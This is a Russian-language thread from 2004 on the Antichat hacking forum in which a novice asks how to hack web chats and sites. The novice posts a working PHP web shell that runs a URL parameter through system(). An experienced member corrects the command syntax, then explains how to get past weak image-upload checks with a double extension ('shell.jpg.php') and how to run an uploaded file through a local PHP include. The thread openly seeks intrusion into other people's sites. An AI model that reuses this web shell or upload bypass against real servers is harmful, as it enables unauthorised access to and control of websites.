Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
12.10.2004, 00:03
|
|
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0
Репутация:
82
|
|
2 Morph
прав на половину, точнее на одну треть!
ну бедешь ты знать HTML, ну разбудят тебя в 3 часа ночи и ты сможешь наизусь рассказать спецификацию XHTML 1.0, но чат то ты все равно не сможешь взломать!  |
|
|
12.10.2004, 02:07
|
|
Новичок
Регистрация: 15.09.2004
Сообщений: 15
Провел на форуме:
0
Репутация:
0
|
|
В общем НАРОД... HTML я знаю как свои 5-ть пальцев ... САМ сайты создаю ...
Трюки типа ЭтогО я поже делать умею и воображение у меня есть 
НЕ могли бы вы на конкретном ПРИМЕРе ... показать -объястнить - разъястнить ... ? |
|
|
|
12.10.2004, 07:46
|
|
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0
Репутация:
82
|
|
2 Zak
ну если так, то тебе осталось посмотреть пару видео о вломе чатов и прочитать пару статей про чаты и IE
|
|
|
|
15.10.2004, 02:05
|
|
Новичок
Регистрация: 15.09.2004
Сообщений: 15
Провел на форуме:
0
Репутация:
0
|
|
2 zFailure
ОкИ ... будем смотреть ...
|
|
|
|
16.10.2004, 08:17
|
|
Новичок
Регистрация: 15.09.2004
Сообщений: 15
Провел на форуме:
0
Репутация:
0
|
|
ТАК ... прочитал почти ВсЕ, что у ВАС тут есть ...
Не помогает или до меня не доходит.
В общем предложите мне на каком-нибудь ЧаТе потренироваться ... только без подстав |
|
|
|
17.10.2004, 05:50
|
|
Новичок
Регистрация: 15.09.2004
Сообщений: 15
Провел на форуме:
0
Репутация:
0
|
|
А могу ли я сам себя взломать, т.е. у меня установленно Apache ...
Нампример - установить у себя 2 хоста:
На один из них закачать с какого-нибудь сайта скрипт ЧаТа (chat.ru)
А на другом например будут все мои скрипты ? (narod.ru)
ВОТ я так попробовал, но только у меня не установленна mySQL...
И при попытке из php вызвать скрипт:
<?
if (!empty($_GET['c'])) {
echo '<pre>';
system($_GET['c']);
echo '</pre>';
exit;
}
?>
то в окне у меня становиться "слишком" чисто - ничего на нем нет - пусто.
Прописываю .php?c=|c -| все равно пусто ... хотя же должно появиться содержимое папки.
Хотя remview.php работает ...
Просто у меня возник вопрос - можно самого себя ?
И еще можно не делать копии на сервере, а закачивать к себе на сервер ?
2 zFailure
Можно еще где-нибудь на сайте написать функции, которые ВЫ пишите в адресе после ".php?" с объяснениями.
|
|
|
|
17.10.2004, 12:27
|
|
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0
Репутация:
82
|
|
не во первых не .php?c=|c -|
а .php?c=lc -l (L - маленькая)
во вторых сомневаюсь что у тебя стоит UNIX система
тогда .php?c=dir
это не функции а команды
открой любой справочник по UNIX, ты найдешь их там
а если есть UNIX то заглени в папку /bin
они все лежат там
|
|
|
|
20.10.2004, 02:35
|
|
Новичок
Регистрация: 15.09.2004
Сообщений: 15
Провел на форуме:
0
Репутация:
0
|
|
Можно ломануть через url ... но тут у меня вопрос можно ли ломануть через "обзор", т.е. на сайте предлагается закачать картинку со своего компа.
Вопрос: Можно закачать снифер с себе на диск и после этого залить его на сервер ?
|
|
|
|
20.10.2004, 10:07
|
|
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0
Репутация:
82
|
|
если скрипт ничего не скажет на расширение php то можно!
иногда програмери делают тупую проверку
типа такого
if (strpos('.jpg',s)) {
...
тогда прокатит такая фича
shell.jpg.php
если на сайте есть местная php иньекция, то и расширение можно оставить .jpg, а потом просто подключить!
|
|
|
|
20.10.2004, 17:56
|
|
Новичок
Регистрация: 03.10.2004
Сообщений: 14
Провел на форуме:
0
Репутация:
0
|
|
zFailure
Что за инъекция, напиши!
)) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
